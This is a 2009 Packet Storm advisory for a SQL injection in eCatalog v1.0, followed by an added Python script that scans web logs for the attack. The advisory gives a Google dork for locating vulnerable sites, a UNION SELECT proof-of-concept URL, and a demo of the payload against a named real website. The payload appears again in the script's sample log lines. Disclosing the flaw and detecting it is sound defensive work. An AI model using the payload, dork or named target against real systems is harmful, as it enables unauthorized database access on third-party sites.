eCatalog Software SQL Injection

2009-09-21T00:00:00
ID PACKETSTORM:81473
Type packetstorm
Reporter Don Tukulesto
Modified 2009-09-21T00:00:00

Description

                                        
`#############################################################  
## eCatalog Software - item.php?id ##  
## Author : Don Tukulesto (tukulesto[at]hackermail[dot]com)##  
## Homepage : http://www.indonesiancoder.com ##  
## Date : Sunday, August 30, 2009 ##  
#############################################################  
  
[ Software Information ]  
  
[+] Software : eCatalog v1.0  
[+] Vulnerability : SQL injection  
[+] Google Dork : inurl:item.php?id "eCatalog"  
  
#############################################################  
  
[ POC ]  
  
http://127.0.0.1/item.php?id=[ID]+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--  
  
[ID] = Valid ID  
  
[ Demo ]  
  
http://www.ibcom.com.my/catalog/item.php?id=-493+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--  
  
#############################################################  
  
[ Greetings ]  
  
[~] All of Indonesian Coder Member, mistersaint, gonzhack, m364tr0n, m3nw5, TUCKER, Petrucii, Chercut,  
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d  
[~] All of Surabayahackerlink Member, bejat Bejat, Plaque, rey_cute, Tuex, XNITRO, DraCoola  
[~] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu, eminem  
[~] Kill-9 crew, kaMtiEz, arianom, tiw0L, Pathloader, RoNz and all of you.  
  
[ QUOTE ]  
  
O you MALINGSIAL, do not try to disturb us.  
We, the nation of INDONESIA, stand ready to defend our country INDONESIA.`
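
A log-review check for the `item.php?id` pattern shown in the POC, as an added example that is not part of the original advisory. It assumes combined-format access logs and that a legitimate `id` is a plain decimal number; the log lines, the addresses and dates in them, and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate item id is a short run of decimal digits.
VALID_ID_RE = re.compile(r'[0-9]{1,10}')
# Used only to grade a value the allowlist has already rejected.
UNION_RE = re.compile(r'\bunion\b.*\bselect\b', re.IGNORECASE | re.DOTALL)


def classify_request(target):
    """Return None if clean or unrelated, else 'union-select' or 'non-numeric-id'."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith('/item.php'):
        return None
    # parse_qs decodes %XX and '+', so encoded variants normalise to one form.
    ids = parse_qs(parts.query, keep_blank_values=True).get('id', [])
    verdict = None
    for value in ids:  # check every id value, not just the first one
        if VALID_ID_RE.fullmatch(value):
            continue
        if UNION_RE.search(value):
            return 'union-select'
        verdict = 'non-numeric-id'
    return verdict


def scan(lines):
    """Yield (line_number, verdict, target) for each suspicious item.php request."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            verdict = classify_request(match.group(1))
            if verdict:
                yield number, verdict, match.group(1)


# Constructed sample log lines (documentation addresses, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /catalog/item.php?id=493 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:07 +0000] "GET /catalog/item.php?id=-493+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15-- HTTP/1.1" 200 4877',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /catalog/item.php?id=-493%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 4877',
    '192.0.2.45 - - [01/Jan/2024:10:00:12 +0000] "GET /catalog/item.php?id=493%27 HTTP/1.1" 500 312',
    '192.0.2.10 - - [01/Jan/2024:10:00:15 +0000] "GET /catalog/index.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == '__main__':
    print(*scan(SAMPLE_LOG), sep='\n')
```

Because the check is an allowlist on the parameter rather than a payload signature, the same rule can be enforced at the application or a reverse proxy to reject such requests before they reach the query.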